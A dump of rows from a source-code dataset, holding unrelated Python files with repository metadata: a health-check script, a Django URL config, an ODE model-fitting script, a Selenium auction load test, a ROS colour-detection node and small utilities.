todayHour=time.strftime("%H:%M:%S")
# Check status: probe one service and abort the whole run on the first failure.
def check (service, url,content):
    """Probe *service* at *url* and exit(1) if the page lacks *content*.

    Prints timing information; on failure prints a diagnostic line with the
    script start timestamp and terminates the process with status 1.
    """
    start = time.time()
    print("Checking "+service)
    valid = contains(url,content)
    print("* Request took {} seconds ".format(int(time.time() - start)))
    if valid:
        print("* OK")
    else:
        error = "'"+url+"' doesn't contain '"+content+"'"
        print("* Service "+service+" check FAILED at "+todayDate+" "+todayHour +": " +error)
        # NOTE: the original built `subject` and `message` strings here but
        # never sent them anywhere (an unfinished e-mail notification);
        # that dead code has been removed.
        sys.exit(1)
def contains (url, content):
    """Return True iff GET *url* succeeds and its body contains *content*.

    Retries up to the module-level `retry` count when the request raises
    (timeout, connection error, ...); returns False if every attempt failed.
    A successful fetch returns immediately, whether or not the text matched.
    """
    for r in range(retry) :
        try:
            text = requests.get(url, timeout = timeout).text
            # `in` is the idiomatic membership test (was: text.find(content) != -1).
            exist = content in text
            if not exist and debug:
                print("""* URL '{}':
** expected '{}'
** got '{}'""".format(url,content,text.encode('utf8')))
            return exist
        except Exception as error:
            print("* ({}) Error in '{}': {}".format(r,url,error))
    return False
# Main
print "Running checkHealth script at "+todayDate+" "+todayHour+"\n"
# Load config
config = ConfigParser.ConfigParser()
config.read("config.cfg")
# [config] section: request timeout (s), debug flag, retry count.
timeout = int (config.get('config', 'timeout') )
debug = config.get('config', 'debug') == 'true'
retry = int (config.get('config', 'retry'))
# Each [servers] entry maps a service name to "endpoint,expected-content".
servers = config.items("servers")
for server in servers:
    service = server[0]
    values = server[1].split(",")
    endpoint = values[0]
    content = values[1]
    # check() exits the process with status 1 on the first failing service.
    check(service,endpoint,content)
print "\nCheckHealth script ended without errors \n"
sys.exit(0)
| [
"rephus@gmail.com"
] | rephus@gmail.com |
aae7dd2cfaf3a8d5e1004d485b4fefda31a6a855 | 3e432355cb71671e899c15a6ca973012f7a07be0 | /django1/urls.py | 658071eccfea6dfd537695a7d7f13e54156e3db9 | [] | no_license | rajeshpandey2053/Django-assignment-1- | b101250ec6da656e0400f84a8e85261259ce00c2 | 6c42fcb5012bb50b557cec029737661d05437130 | refs/heads/master | 2022-11-18T21:15:28.395827 | 2020-07-19T14:47:50 | 2020-07-19T14:47:50 | 280,885,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | """django1 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
    # Django admin interface.
    path('admin/', admin.site.urls),
    # Delegate all /blogapp/ URLs to the blog application's URLconf.
    path('blogapp/', include("blogapp.urls"))
]
| [
"rajeshpandey2053@gmail.com"
] | rajeshpandey2053@gmail.com |
9199606a60e49fbfbf6d066642c2d3562eba52c2 | 8553312aad8af2a7371c2e5884561d3dcd00dda7 | /Model Fitting/Kfold/3 state 3 hill/fold 3/3state3.py | 63b65a59d787b1c774e541bdbedfa9b9b9753134 | [
"MIT"
] | permissive | keung-lab/Dynamic-Transfer-Functions | aa76125b228092d4af93172c9f051c6593b1f4e2 | 68c17a3ccfedab6625cc4d0c2e1c7983d7b46153 | refs/heads/main | 2023-04-09T15:03:48.667157 | 2021-07-20T16:50:33 | 2021-07-20T16:50:33 | 322,337,993 | 1 | 0 | null | 2021-07-20T16:50:34 | 2020-12-17T15:37:06 | MATLAB | UTF-8 | Python | false | false | 5,070 | py | import numpy as np
import pandas as pd
import matplotlib
import jupyter
import scipy
from scipy.integrate import odeint
#%matplotlib inline
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import sklearn
from sklearn.model_selection import StratifiedKFold
from mpi4py import MPI
import sys
from datetime import datetime
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
## Stratified Kfold Validation Setup
# Outputclass.csv: one row per experiment; 'class' column drives stratification,
# 'output' column holds the measured endpoint values.
rn = pd.read_csv('Outputclass.csv')
skf = StratifiedKFold(n_splits=4, shuffle=True, random_state=100)
target = rn.loc[:,'class']
trainendpts = []  # per-fold arrays of training endpoint values
testendpts = []   # NOTE(review): populated nowhere; kept for parity with original
fold_no = 1
# Collect the training-set endpoint values for each of the 4 folds.
for train_index, test_index in skf.split(rn, target):
    train = rn.loc[train_index,:]
    traincols = (np.take(rn['output'],train_index))
    trendpts = np.asarray(traincols)
    trainendpts.append(trendpts)
    fold_no += 1
##
# MPI setup: split the parameter table across ranks; rank 0 reads the files.
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
name = MPI.Get_processor_name()
runtime = datetime.now().time()
arr_size = 0
if rank == 0:
    #rawdata = np.transpose(np.delete(np.genfromtxt('SizeCorrectedAllOut.csv',delimiter=','),0,0))
    # trainendpts[2]: training endpoints of the third fold (this script = fold 3).
    rawdata = trainendpts[2]
    newdata = list(rawdata.flatten())
    # params33.csv: one candidate parameter set per row (header row dropped).
    all_parameters = (np.delete(np.genfromtxt('params33.csv', delimiter=','),0,0))
    # Balanced split: the first (len % size) ranks get one extra row each.
    arr_sizes = [(int)(len(all_parameters)/size)]*size
    parameters = []
    ind = 0
    for i in range(size):
        arr_sizes[i] += i<(len(all_parameters)%size)
        parameters.append(all_parameters[ind:ind+arr_sizes[i]])
        ind += arr_sizes[i]
    #print(parameters)
else:
    parameters = None
# Each rank receives its own slice of the parameter table.
parameters = comm.scatter(parameters, root=0)
comm.Barrier()
# Time grid: 10080 samples, 5 s apart (0 .. 50395 s).
t = np.linspace(0,50395, num=10080)
def func(t):
    """Integrate the ODE model for every local parameter row against every
    training light condition; return the final mCherry2 value of each run.

    Returns `end` of shape (n_local_params, n_light_conditions).  Relies on
    module-level globals: skf, rn, target, parameters, rank.
    """
    z0 = [1,0,0,0,0,0]  # initial state: all promoter mass in Pu, no mRNA/reporter
    trainlight = []
    fold_no = 1
    # Rebuild the same stratified folds as above, this time collecting the
    # light-condition column indices ('cond') for each fold's training set.
    for train_index, test_index in skf.split(rn, target):
        train = rn.loc[train_index,:]
        traincols = (np.take(rn['cond'],train_index))
        lightdata = np.transpose(np.delete(np.genfromtxt('AllLightnosmooth.csv', delimiter=','),0,0))
        trlight = np.array(lightdata[[traincols]])
        trainlight.append(trlight)
        fold_no += 1
    lightdata = trainlight[2]  # index 2 = third fold (this script handles fold 3)
    arrayvalues = np.asarray([])
    end = np.zeros((len(parameters[:,0]),len(lightdata[:,0])))
    for i in range(len(lightdata[:,0])):
        def I(t):
            # Light input lookup: samples are 5 s apart; clamp past the last one.
            tindex = t/5
            if tindex > 10079:
                tindex = 10079
            return lightdata[i][int(tindex)]
        for j in range(len(parameters[:,0])):
            # sys.stdout.write("I am process %d of %d at %s.\n on %s.\n " % (rank, size,runtime, name))
            if rank == 0:
                print(str(j) + '/' + str(len(parameters[:,0])) + ' on ' + str(i) + '/' + str(len(lightdata[:,0])))
            def model(z,t):
                # Free parameters for candidate row j; remaining rates fixed below.
                p1 = parameters[:,0]
                p2 = parameters[:,1]
                p3 = parameters[:,2]
                p4 = parameters[:,3]
                p5 = parameters[:,4]
                p6 = parameters[:,5]
                p7 = parameters[:,6]
                #p8 = parameters[:,7]
                #d3 = p1[j]
                #d4 = p2[j]
                d1 = p1[j]
                k1 = p2[j]
                d2 = p3[j]
                k2 = p4[j]
                Kd = p5[j]
                n = p6[j]
                k3 = p7[j]
                #d3 = p8[j]
                #d1 = 0.017281
                #k1 = 0.4241
                #d2 = 1.7709
                #k2 = 0.021968
                #Kd = 2143.243
                #n = 0.815678
                #k3 = 0.000287
                # Fixed rates (mRNA decay, reporter maturation/decay).
                d3 = 0.000544
                k4 = 1.25
                d4 = 0.0000924
                k5 = 0.00144
                # State: three promoter states, mRNA, and a two-step reporter.
                Pu = z[0]
                Pb = z[1]
                Pa = z[2]
                mRNA = z[3]
                mCherry1 = z[4]
                mCherry2 = z[5]
                # Light drives Pu -> Pb -> Pa through a Hill-type term
                # I(t)^n / (Kd^n + I(t)^n); Pa produces mRNA.
                dPudt = d1*Pb - k1*I(t)**n/(Kd**n+I(t)**n)*Pu
                dPbdt = k1*I(t)**n/(Kd**n+I(t)**n)*Pu + d2*Pa - d1*Pb - k2*I(t)**n/(Kd**n+I(t)**n)*Pb
                dPadt = k2*I(t)**n/(Kd**n+I(t)**n)*Pb - d2*Pa
                dmRNAdt = k3*I(t)**n/(Kd**n+I(t)**n)*Pa - d3*mRNA
                dmCherry1dt = k4*mRNA-(d4 + k5)*mCherry1
                dmCherry2dt = k5*mCherry1-d4*mCherry2
                return [dPudt,dPbdt,dPadt,dmRNAdt,dmCherry1dt,dmCherry2dt]
            z = odeint(model,z0,t, hmax=1)
            # Record only the final mature-reporter value of the trajectory.
            mCherry2 = z[:,5]
            end[j,i] = mCherry2[-1]
    return end
model1 = np.asarray(func(t))
#gather here
# Collect every rank's (n_local_params x n_conditions) slab on rank 0.
model1 = comm.gather(model1,root=0)
if rank == 0:
    model1 = np.concatenate(model1)
    ydata = np.asarray(newdata)
    np.savetxt('3model_out_fold3.csv',model1,delimiter=',')
    # print('end = ', model1)
    # print(ydata)
    # Write one R^2 (coefficient of determination) per candidate parameter row.
    with open('3model_R2_fold3.csv','w') as f:
        for j in range(len(all_parameters[:,0])):
            ssr = np.sum((ydata - model1[j])**2)
            sst = np.sum((ydata - np.mean(ydata))**2)
            R2 = 1 - ssr/sst
            f.write(str(j+1) + ',' + str(R2) + '\n')
| [
"noreply@github.com"
] | keung-lab.noreply@github.com |
73c2c8db45940756b9d7256370367dd3f7dde382 | 6d906ae790de5494692bf6a12668d60418b1da72 | /govauction_load/load_test_file.py | c8ad61090d505bce78eaa9399afb8b0ddc07849e | [
"Apache-2.0"
] | permissive | lesiavl/selenium_perfomance_tests | 6c5407172bdf05a08b669b6f80bc287e94e34ef9 | 83cb1d734d6723cc5b6d6a8aa37b6598f06cbcfe | refs/heads/master | 2021-01-22T10:56:02.462717 | 2017-06-01T10:39:24 | 2017-06-01T10:39:24 | 82,050,059 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,288 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from page_objects import *
from selenium import webdriver
import datetime
import time
import Queue
import threading
import traceback
# Work queues and shared state for the three thread stages below.
tenders = Queue.Queue()   # signals for the tender-creation threads
tenders_ids = []          # IDs of successfully created tenders
tenders_threads = 1       # number of concurrent tender creators
bids = Queue.Queue()      # signals for the bid-making threads
bids_failed = {}          # tender_id -> 'passed' / 'failed'
runs = Queue.Queue()      # signals for the simultaneous bid-run threads
class CreateTenders(threading.Thread):
    """Worker thread: logs in as the owner, creates one tender per queue
    signal, and records the new tender's ID in the shared `tenders_ids` list.
    """
    exited = False  # set to True when run() aborted with an exception
    def __init__(self, queue, driver):
        threading.Thread.__init__(self)
        self.queue = queue
        self.driver = driver
        # Page objects bound to this thread's own browser instance.
        self.login_page_owner = LoginPage(
            owner_users['email'], owner_users['password'], self.driver
        )
        self.create_tender_page = CreateTenderPage(self.driver)
        self.find_tender = FindTenderPage(self.driver)
    def run(self):
        while True:
            # Wait for start
            self.queue.get()
            # Process business logic
            self.driver.get(broker['url'])
            try:
                self.login_page_owner.login_as_owner()
                self.driver.get(create_tender_url)
                self.create_tender_page.create_tender()
                tenders_ids.append(self.find_tender.get_tender_id())
            except Exception as error:
                # self.driver.close()
                self.exited = True
                print (error)
                traceback.print_exc()
                raise error
            finally:
                # Always mark the work item done so tenders.join() can return.
                self.queue.task_done()
class MakeTendersBids(threading.Thread):
    """Worker thread: logs in as a provider and places a bid on one tender.

    Records the outcome in the shared `bids_failed` dict under the tender ID.
    """
    exited = False  # set to True when run() aborted with an exception
    def __init__(self, queue, user, password, tender_id, driver):
        threading.Thread.__init__(self)
        self.queue = queue
        self.driver = driver
        self.tender_id = tender_id
        # Page objects bound to this thread's own browser instance.
        self.login_page_provider = LoginPage(user, password, self.driver)
        self.find_tender = FindTenderPage(self.driver)
        self.make_bid_page = MakeBidPage(self.driver)
    def run(self):
        while True:
            # Wait for start
            self.queue.get()
            self.driver.get(broker['url'])
            # Process business logic
            try:
                self.login_page_provider.login_as_provider()
                self.driver.get(tenders_list)
                self.find_tender.find_tender(self.tender_id)
                if not self.make_bid_page.make_bid():
                    bids_failed[self.tender_id] = 'failed'
                    print('Bid failed for tender: {}'.format(self.tender_id))
                    return
                bids_failed[self.tender_id] = 'passed'
                print('Bid success for tender {}'.format(self.tender_id))
            except Exception as error:
                # self.driver.close()
                # BUG FIX: was `self.exited = False`, a no-op since the class
                # default is already False; CreateTenders sets True here.
                self.exited = True
                print(error)
                traceback.print_exc()
                raise error
            finally:
                # Always mark the work item done so bids.join() can return.
                self.queue.task_done()
class RunTenderBids(threading.Thread):
    """Worker thread: fires an already-prepared bid and logs start/finish
    timestamps for the given "provider tender" label to load_results.txt.
    """
    def __init__(self, queue, driver, providerAndTender):
        threading.Thread.__init__(self)
        self.queue = queue
        self.driver = driver
        self.make_bid_page = MakeBidPage(self.driver)
        self.providerAndTender = providerAndTender
    def run(self):
        while True:
            # Block until the main script releases all runners at once.
            self.queue.get()
            try:
                log = open('load_results.txt', 'a')
                with log:
                    started = '{} started bid for {} —---------------- STARTED\n'
                    finished = '{} made bid for {} —---------------- FINISHED\n'
                    log.write(started.format(self.providerAndTender, datetime.datetime.now()))
                    self.make_bid_page.run_bid()
                    log.write(finished.format(self.providerAndTender, datetime.datetime.now()))
                    log.close()
            finally:
                self.queue.task_done()
start = time.time()
# Start creating tenders
# Stage 1: one browser per creator thread; each thread makes one tender.
print('Start creating tenders...')
for i in range(tenders_threads):
    driver = webdriver.Chrome()
    driver.set_window_size(1200, 1000)
    t = CreateTenders(tenders, driver)
    t.setDaemon(True)
    t.start()
for i in range(tenders_threads):
    tenders.put(True)
# Wait for all to complete
tenders.join()
print('Tenders created - ' + ', '.join(tenders_ids))
# Start making tenders bids
# Stage 2: every provider bids on every tender, each in its own browser.
print('Start making bids...')
drivers = {}
for tid in tenders_ids:
    for provider in provider_users.items():
        driver = webdriver.Chrome()
        driver.set_window_size(1200, 1000)
        # Keyed "provider tender" so stage 3 can reuse the same sessions.
        drivers['{} {}'.format(provider[0], tid)] = driver
        b = MakeTendersBids(bids, provider[0], provider[1], tid, driver)
        b.setDaemon(True)
        print(provider[0], tid)
        b.start()
for tid in tenders_ids:
    for provider in provider_users.items():
        bids.put(True)
bids.join()
print('Bids made')
print(bids_failed)
with open('load_results.txt', 'a') as f:
    f.write('{} failed \n'.format(bids_failed))
    f.close()
# Start making by clicking simultaneously
# Stage 3: release every prepared session at once to load-test the auction.
print('Start running bids...')
for driver in drivers.keys():
    c = RunTenderBids(runs, drivers[driver], driver)
    c.setDaemon(True)
    c.start()
for driver in drivers:
    runs.put(True)
runs.join()
print('Runs performed')
print("Elapsed Time: %s" % (time.time() - start))
# Close every browser opened in stage 2.
for driver in drivers:
    drivers[driver].close()
| [
"lesia.velychko@gmail.com"
] | lesia.velychko@gmail.com |
5ec315cf056563ef4196d389d7e6b49012941112 | 9ee1e6efea3899edef676a13b3a5d5c38a5f9ce1 | /Task_Module01/ceknum.py | 7b21e220931176559fcd5418c4aa7774731c168a | [] | no_license | ksmrdn/Module01_Python | 8f455fb36b097edf6a40e53b1162ef4355668ab9 | dbde29247e8978876f6e1c71397297cfda016a3a | refs/heads/master | 2020-09-07T22:39:40.716886 | 2019-11-11T08:25:18 | 2019-11-11T08:25:18 | 220,932,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | num0 = 12
golongan = []  # accumulates the classification labels for num0 ("golongan" = category)
def prima(x):
    """Return True if integer *x* is prime, False otherwise.

    Numbers below 2 (including negatives) are not prime.  Trial division
    now runs only over odd divisors up to sqrt(x) — O(sqrt(n)) instead of
    the original O(n) scan over every integer in [2, x).
    """
    if x < 2:
        return False
    if x == 2:
        return True
    if x % 2 == 0:
        return False
    # Only odd candidates from 3 to floor(sqrt(x)) need checking.
    for i in range(3, int(x ** 0.5) + 1, 2):
        if x % i == 0:
            return False
    return True
print(prima(num0))
# Classify num0 with Indonesian labels:
# Bulat=integer, Cacah=whole (>=0), Asli=natural (>0), Genap=even,
# Ganjil=odd, Prima=prime, Komposit=composite, Negatif=negative, Nol=zero.
if type(num0) == int:
    golongan.append('Bulat')
    if num0 >= 0:
        golongan.append('Cacah')
    if num0 > 0:
        golongan.append('Asli')
    if num0 % 2 == 0:
        golongan.append('Genap')
    elif num0 % 2 != 0:
        golongan.append('Ganjil')
    if prima(num0) == True:
        golongan.append('Prima')
    else:
        golongan.append('Komposit')
if num0 < 0:
    golongan.append('Negatif')
elif num0 == 0:
    golongan.append('Nol')
print(golongan)
| [
"kusumardanar@gmail.com"
] | kusumardanar@gmail.com |
fe0b784d9423f6752a2e04ea2db13d45f4526bf0 | 7249edf3365731c92a9c9c05db3186894306cc17 | /python/src/vmaf/svmutil.py | ca49e991943642c3fce7b7aca7f07566c7af3622 | [
"LGPL-3.0-or-later",
"Apache-2.0"
] | permissive | sunery/vmaf | 22e2f782549e1c71aa6f5160f26350e0aca06189 | 03eb8a4980b1bf2b3edd66767e67927109dbd9de | refs/heads/master | 2020-04-01T15:12:57.469291 | 2018-10-15T00:31:21 | 2018-10-15T00:31:21 | 153,327,009 | 1 | 0 | Apache-2.0 | 2018-10-16T17:32:53 | 2018-10-16T17:32:53 | null | UTF-8 | Python | false | false | 735 | py | # TODO: dependency on libsvm/svmutil needs to be properly done, this is a temporary workaround wrapper
from __future__ import absolute_import
import sys
from vmaf.config import VmafConfig
# This will work only when running with a checked out vmaf source, but not via pip install
libsvm_path = VmafConfig.root_path('libsvm', 'python')
if libsvm_path not in sys.path:
# Inject {project}/libsvm/python to PYTHONPATH dynamically
sys.path.append(libsvm_path)
try:
# This import will work only if above injection was meaningful (ie: user has the files in the right place)
from svmutil import * # noqa
except ImportError as e:
print "Can't import svmutil from %s: %s" % (libsvm_path, e)
sys.exit(1)
| [
"zli@netflix.com"
] | zli@netflix.com |
a85f58e88b5664a708051c99c0c4ada535118d4e | 70121257e52e0fd2f0895414fcee3c991737443a | /python_recipes/danfo_csv.py | 96c22906850257b9b40aa400587b7180e3fa23bd | [] | no_license | OlgaBelitskaya/cookbooks | 2e54208bb5e5157814deea6ff71cd7ce5b1e4972 | 216dde3e5617203371ed4c4bb7d9e8391640c588 | refs/heads/master | 2021-07-11T15:56:44.923442 | 2021-03-25T08:38:46 | 2021-03-25T08:38:46 | 99,447,645 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,696 | py | from IPython.core.display import display,HTML
def danfo_table_csv(url,columns,header_font_size):
    """Display a remote CSV as a Danfo.js table inside the notebook.

    Builds a self-contained HTML page that loads danfojs from a CDN, reads
    the CSV at *url*, selects *columns*, and renders them as a table whose
    header uses *header_font_size*.
    """
    head = (
        "<html><head><meta charset='UTF-8'>"
        "<meta name='viewport' "
        "content='width=device-width,initial-scale=1.0'>"
        "<script src='https://cdn.jsdelivr.net/npm/"
        "danfojs@0.1.1/dist/index.min.js'></script></head>"
    )
    body = (
        "<div><p> CSV =>>> Danfo DataFrames</p>"
        "<div id='div015_1'></div><script>"
        + "var url='" + url + "'; "
        + "dfd.read_csv(url)"
        + " .then(df=>{df.loc({columns:" + str(columns)
        + "}).plot('div015_1').table({header_style:"
        + "{font:{size:" + str(header_font_size) + "}}})})"
        + " .catch(err=>{console.log(err);})"
        + "</script></div></html>"
    )
    display(HTML(head + body))
def danfo_chart_csv(url,columns,line_width,title):
    """Display a remote CSV as a Danfo.js line chart inside the notebook.

    Builds a self-contained HTML page that loads danfojs from a CDN, reads
    the CSV at *url*, and plots *columns* as lines of width *line_width*
    under the chart *title*.
    """
    head = (
        "<html><head><meta charset='UTF-8'>"
        "<meta name='viewport' "
        "content='width=device-width,initial-scale=1.0'>"
        "<script src='https://cdn.jsdelivr.net/npm/"
        "danfojs@0.1.1/dist/index.min.js'> </script></head>"
    )
    body = (
        "<body><p> CSV =>>> Danfo DataFrames</p>"
        "<div id='div015_2'></div><script>"
        + "var url='" + url + "'; "
        + "dfd.read_csv(url).then(df=>{var layout={"
        + " title:'" + title
        + "',xaxis:{title:'columns'},"
        + " yaxis:{title:'value'}}; "
        + " df.plot('div015_2').line({"
        + "line:{width:" + str(line_width) + "},"
        + "columns:" + str(columns) + ",layout:layout})})"
        + " .catch(err=>{console.log(err);})"
        + "</script></body></html>"
    )
    display(HTML(head + body))
"safuolga@gmail.com"
] | safuolga@gmail.com |
55dbe8317f1c57f0eda91ec6f4ea5d6a3355faf5 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Flickr/Places/FindByKeyword.py | c0620abf4ec0d8e85c197a86e1e3a6d28555d771 | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,859 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# FindByKeyword
# Returns a list of place IDs for a query string.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FindByKeyword(Choreography):
    """Choreo binding for Flickr's place-ID lookup by query string."""
    def __init__(self, temboo_session):
        """Bind this Choreo to *temboo_session* (a TembooSession carrying
        valid Temboo credentials)."""
        Choreography.__init__(self, temboo_session, '/Library/Flickr/Places/FindByKeyword')
    def new_input_set(self):
        """Return a fresh, empty input set for this Choreo."""
        return FindByKeywordInputSet()
    def _make_result_set(self, result, path):
        """Wrap a raw execution result in the Choreo-specific result set."""
        result_set = FindByKeywordResultSet(result, path)
        return result_set
    def _make_execution(self, session, exec_id, path):
        """Create an execution handle for a running instance of this Choreo."""
        execution = FindByKeywordChoreographyExecution(session, exec_id, path)
        return execution
class FindByKeywordInputSet(InputSet):
    """Input container for the FindByKeyword Choreo; use the setters below
    to supply parameters before execution."""
    def set_APIKey(self, value):
        """(required, string) The API Key provided by Flickr (AKA the OAuth Consumer Key)."""
        self._set_input('APIKey', value)
    def set_Query(self, value):
        """(required, string) The query string to use for place ID lookups."""
        self._set_input('Query', value)
    def set_ResponseFormat(self, value):
        """(optional, string) Response format: 'xml' or 'json' (default json)."""
        self._set_input('ResponseFormat', value)
class FindByKeywordResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the FindByKeyword Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, json_str):
        """Parse *json_str* (a JSON document) and return the resulting object.

        The parameter was previously named ``str``, shadowing the builtin;
        positional callers are unaffected by the rename.
        """
        return json.loads(json_str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. (The response from Flickr.)
        """
        return self._output.get('Response', None)
class FindByKeywordChoreographyExecution(ChoreographyExecution):
    """Execution handle for FindByKeyword; produces matching result sets."""
    def _make_result_set(self, response, path):
        result_set = FindByKeywordResultSet(response, path)
        return result_set
| [
"dattasaurabh82@gmail.com"
] | dattasaurabh82@gmail.com |
51c528349ae5eff94470ab12a4bdbfcaee39eb2e | 39e5ba31a0b0389ebdd787231b05c58ad1f50aac | /6-输入与输出/1.字面量.py | fd88bc9bd8959244859538d7ebd647d7359d9f8c | [] | no_license | yicg/python_demo | 19f7f428bcf61c92cadf4469d89fb88e8fb84c30 | bcf9819ab21f8e28af5de4447a52a8c655d02278 | refs/heads/master | 2023-03-26T19:08:56.173250 | 2021-03-25T09:58:37 | 2021-03-25T09:58:37 | 343,789,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@Author :yicg
@Time : 2021/2/18 下午2:16
@Version : 1.0
@Description :
"""
# 1. Formatted output
name='lili'
age=20
print("my name is {},age is {}".format(name,age))  # -> my name is lili,age is 20
print("======================")
name_list=['zhangsan','lisi','wangwu']
# str.format can take lists, dicts, etc., but they must be unpacked with * / **.
print("my name is {},{},{}".format(*name_list))  # -> my name is zhangsan,lisi,wangwu
print("======================")
# f-strings are preferred: no unpacking needed to interpolate a variable.
print(f"name is {name}",name_list)  # -> name is lili ['zhangsan', 'lisi', 'wangwu']
# Unpacking also works alongside f-strings (as extra print arguments).
print(f"name is {name}",*name_list)  # -> name is lili zhangsan lisi wangwu
print("======================")
"yichunguangyx@163.com"
] | yichunguangyx@163.com |
75db8c0b74e36ae5d402823fe9e9d389fa1c33b4 | adc8c698d282cb6100560b22744c349fd2b471d2 | /src/PB_5917_Final_Task/5917_ip.py | 7cf9973082b9e31f6ad1d78621c8869c3f3d5904 | [] | no_license | atharvakarpate/E_Yantra_2019 | 468e4372ee131008ad62d292482a80b0a29f8910 | a02fd6ff6032527e12736b3c7d02c84d7377c8b5 | refs/heads/main | 2023-08-21T05:30:09.157633 | 2021-10-29T00:23:23 | 2021-10-29T00:23:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,159 | py | #!/usr/bin/env python
"""
* Id : 5917
* Author : Atharva Karpate
* Filename: task_3_ip.py
* Theme: Pollinator Bee
* Functions: __init__,image_callback,Colorno
* Global Variables: red(Stores number of red Contours),redC(Stores the BGR value of red)
green(Stores number of green Contours),greemC(Stores the BGR value of green)
blue(Stores number of blue Contours),blueC(Stores the BGR value of blue)
* Description: Image processing for multiple waypoints(pollinations).
"""
import rospy, cv2, cv_bridge
import numpy as np
from sensor_msgs.msg import Image
from geometry_msgs.msg import Twist
from geometry_msgs.msg import PoseArray
from std_msgs.msg import Int32
from std_msgs.msg import Float64
red = 0
green = 0
blue = 0
redC = (0, 0, 255)
greenC = (0, 255, 0)
blueC = (255, 0, 0)
class ColorDetect:
    """
    * Function Name: __init__
    * Input: None(self)
    * Output: Provides whycon/image_out and initialises ros_bridge
    * Logic: Subscribes to whycon/image_out via ros_bridge
    * Example Call: As soon as object is decalared.
    """
    def __init__(self):
        # Per-colour contour counts, recomputed on every DrawPub() call.
        self.red = 0
        self.green = 0
        self.blue = 0
        self.b = 0  # scratch counter used by Colorno() for de-duplication
        rospy.init_node("ros_bridge")
        # self.img= np.zeros((1,2,3),np.uint8)
        rospy.sleep(0.1)
        # Create a ROS Bridge
        self.ros_bridge = cv_bridge.CvBridge()
        self.pub = rospy.Publisher("red", Float64, queue_size=1000)
        self.pub1 = rospy.Publisher("blue", Float64, queue_size=1000)
        self.pub2 = rospy.Publisher("green", Float64, queue_size=1000)
        self.pub3 = rospy.Publisher("points", Float64, queue_size=1000)
        # Subscribe to whycon image_out
        self.image_sub = rospy.Subscriber(
            "/usb_cam/image_rect_color", Image, self.image_callback
        )
        # NOTE(review): this re-creates the "red" publisher created above,
        # discarding the first handle — presumably redundant; confirm intent.
        self.pub = rospy.Publisher(
            "red", Float64, queue_size=1000
        )  # Publisher for red Topic
        self.points = []  # detected patches as [cx, cy, colorBGR] triples
    """
    * Function Name:image_callback
    * Input: msg
    * Output: Provides openCv frame from ros image message
    * Logic: Converts ros image message to openCv frame via ros_bridge.imgmsg_to_cv2(msg, desired_encoding='bgr8')
    * Example Call: image_callback(msg)
    """
    def image_callback(self, msg):
        # 'image' is now an opencv frame
        # You can run opencv operations on 'image'
        self.image = self.ros_bridge.imgmsg_to_cv2(msg, desired_encoding="bgr8")
        self.img = self.image  # self.image is stored in self.img
    """
    * Function Name:DetectColor
    * Input: None(self)
    * Output: Stores the number of red,green and blue patches in their respective variables
    * Logic: First blurs the image ,then converts in to hsv . Calls function colorno to detect the number of squares of the particular number
    * Example Call: DetectColor()
    """
    def DetectColor(self):
        # BGR values used to tag and later count each colour's contours.
        redC = (0, 0, 255)
        greenC = (0, 255, 0)
        blueC = (255, 0, 0)
        self.blur = cv2.medianBlur(self.img, 5)  # To blur the image to reduce noise
        self.hsv = cv2.cvtColor(self.blur, cv2.COLOR_BGR2HSV)  # conversion to hsv
        # Hand-tuned HSV thresholds for each colour; presumably calibrated
        # for the arena lighting — TODO confirm before reuse elsewhere.
        lower_blue = np.array([97, 51, 227])
        upper_blue = np.array([143, 198, 253])
        lower_red = np.array([135, 47, 227])
        upper_red = np.array([211, 255, 255])
        lower_green = np.array([30, 61, 190])
        upper_green = np.array([80, 153, 255])
        # Provides with the number of color squares and stores in red,green and blue respectively.
        self.Colorno(lower_red, upper_red, redC)
        self.Colorno(lower_green, upper_green, greenC)
        self.Colorno(lower_blue, upper_blue, blueC)
        self.DrawPub(self.points)
    """
    * Function Name:DrawPub
    * Input: points
    * Output: Draws rectangles(contours) and publishes the values of red, blue, green and points
    * Logic: Draws rectangle using rectangle fucntion of detected colour
    * Example Call: DetectColor()
    """
    def DrawPub(self, points):
        self.red = 0
        self.green = 0
        self.blue = 0
        for x in range(0, len(points)):
            # 30x30 px box centred on the detected centroid, in the patch colour.
            cv2.rectangle(
                self.img,
                (points[x][0] - 15, points[x][1] - 15),
                (points[x][0] + 15, points[x][1] + 15),
                points[x][2],
                2,
            )
            # Tally counts by the BGR tag attached in Colorno().
            if points[x][2] == (0, 0, 255):
                self.red += 1
            elif points[x][2] == (0, 255, 0):
                self.green += 1
            elif points[x][2] == (255, 0, 0):
                self.blue += 1
